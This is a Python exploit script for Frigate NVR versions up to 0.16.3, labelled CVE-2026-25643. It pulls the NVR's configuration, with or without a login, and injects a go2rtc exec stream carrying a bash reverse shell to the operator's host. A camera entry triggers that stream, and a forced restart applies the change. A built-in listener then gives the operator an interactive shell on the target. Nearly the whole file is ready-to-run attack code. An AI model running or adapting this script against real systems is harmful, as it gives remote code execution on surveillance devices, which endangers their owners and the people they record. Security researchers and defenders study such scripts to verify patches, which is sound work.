# Exploit Title: Frigate NVR <= 0.16.3 - RCE (Authenticated & Unauthenticated) # Date: 2026-02-05 # Exploit Author: jduardo2704 # Vendor Homepage: https://frigate.video/ # Software Link: https://github.com/blakeblackshear/frigate # Version: <= 0.16.3 # Tested on: Linux / Docker # CVE: CVE-2026-25643 # Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x import requests import argparse import sys import json import urllib3 import yaml import time import socket import threading import select import re # Silence SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Colors GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' BLUE = '\033[94m' RESET = '\033[0m' # Event to synchronize the listener with the exploit thread exploit_ready = threading.Event() def print_status(msg, color=BLUE, symbol="[*]"): print(f"{color}{symbol} {msg}{RESET}") def login_frigate(session, url, username, password): try: print_status(f"Authenticating as {username}...", BLUE) res = session.post(f"{url}/api/login", json={"user": username, "password": password}, verify=False, timeout=10) return res.status_code == 200 except: return False def get_config(session, url): try: res = session.get(f"{url}/api/config/raw", timeout=10) content = res.text.strip() if content.startswith('"'): try: config_raw = json.loads(content) except: config_raw = content else: config_raw = content return yaml.safe_load(config_raw) except: return None def send_payload(session, url, data): final_yaml = yaml.dump(data) try: session.post( f"{url}/api/config/save?save_option=restart", data=final_yaml, headers={"Content-Type": "text/plain"}, timeout=5 ) except: pass def inject_and_exploit(url, username, password, lhost, lport): """Function to run in background thread""" session = requests.Session() session.verify = False # 1. AUTHENTICATION LOGIC if username and password: if not login_frigate(session, url, username, password): print_status("Login failed with provided credentials.", RED, "[-]") sys.exit(1) print_status("Logged in successfully.", BLUE) else: print_status("No credentials provided. Trying unauthenticated access...", YELLOW) # 2. CONFIG RETRIEVAL & VALIDATION print_status("Fetching configuration...", BLUE) config = get_config(session, url) if not config or not isinstance(config, dict): print_status("Failed to retrieve a valid configuration dictionary.", RED, "[-]") print_status("Target might be authenticated or API is restricted.", RED, "[-]") sys.exit(1) # 3. PAYLOAD PREPARATION try: payload = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'" # Inject go2rtc if 'go2rtc' not in config or config['go2rtc'] is None: config['go2rtc'] = {} if 'streams' not in config['go2rtc'] or config['go2rtc']['streams'] is None: config['go2rtc']['streams'] = {} config['go2rtc']['streams']['cve_poc'] = [f"exec:{payload}"] # Inject camera trigger if 'cameras' not in config or config['cameras'] is None: config['cameras'] = {} config['cameras']['cve_trigger'] = { 'ffmpeg': {'inputs': [{'path': 'rtsp://127.0.0.1:8554/cve_poc', 'roles': ['detect']}]}, 'detect': {'enabled': False}, 'audio': {'enabled': False}, 'enabled': True } print_status("Payload injected into config structure.", GREEN, "[+]") # 4. SIGNAL LISTENER TO START exploit_ready.set() time.sleep(5) print_status("Sending malicious config & triggering restart...", YELLOW) send_payload(session, url, config) except Exception as e: print_status(f"Error during payload injection: {e}", RED, "[-]") sys.exit(1) def shell_handler(lport): """Handles the incoming reverse shell connection""" print_status("Waiting for validation...", BLUE) if not exploit_ready.wait(timeout=20): print_status("Timeout waiting for exploit thread validation.", RED, "[-]") return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: s.bind(('0.0.0.0', int(lport))) s.listen(1) print_status(f"Validation OK. Listening on 0.0.0.0:{lport}...", GREEN, "[+]") s.settimeout(60) try: conn, addr = s.accept() print_status(f"Connection received from {addr[0]}!", GREEN, "[+]") print(f"{YELLOW}--- SHELL ESTABLISHED ---\n{RESET}") s.settimeout(None) conn.settimeout(None) while True: r, _, _ = select.select([sys.stdin, conn], [], []) if conn in r: data = conn.recv(4096) if not data: break # CLEAN OUTPUT LOGIC output = data.decode(errors='ignore') # Remove annoying bash TTY errors using Regex # Matches "bash: cannot set terminal process group (PID): Inappropriate ioctl..." output = re.sub(r"bash: cannot set terminal process group \(\d+\): Inappropriate ioctl for device\r?\n?", "", output) # Matches "bash: no job control in this shell" output = output.replace("bash: no job control in this shell\r\n", "") output = output.replace("bash: no job control in this shell\n", "") sys.stdout.write(output) sys.stdout.flush() if sys.stdin in r: cmd = sys.stdin.readline() conn.send(cmd.encode()) except socket.timeout: print_status("Exploit sent but no connection received (Timeout > 60s).", RED, "[-]") except KeyboardInterrupt: print_status("\nClosing connection.", RED) except Exception as e: print_status(f"Listener error: {e}", RED) finally: s.close() def main(): parser = argparse.ArgumentParser(description="Frigate <= 0.16.3 RCE (Auto-Shell) - CVE-2026-25643") parser.add_argument('-u', '--url', required=True, help="Target URL") parser.add_argument('-U', '--username', required=False, help="Username (optional)") parser.add_argument('-P', '--password', required=False, help="Password (optional)") parser.add_argument('-lh', '--lhost', required=True, help="Your IP (LHOST)") parser.add_argument('-lp', '--lport', required=True, help="Your Port (LPORT)") args = parser.parse_args() exploit_thread = threading.Thread( target=inject_and_exploit, args=(args.url.rstrip('/'), args.username, args.password, args.lhost, args.lport) ) exploit_thread.daemon = True exploit_thread.start() shell_handler(args.lport) if __name__ == "__main__": main()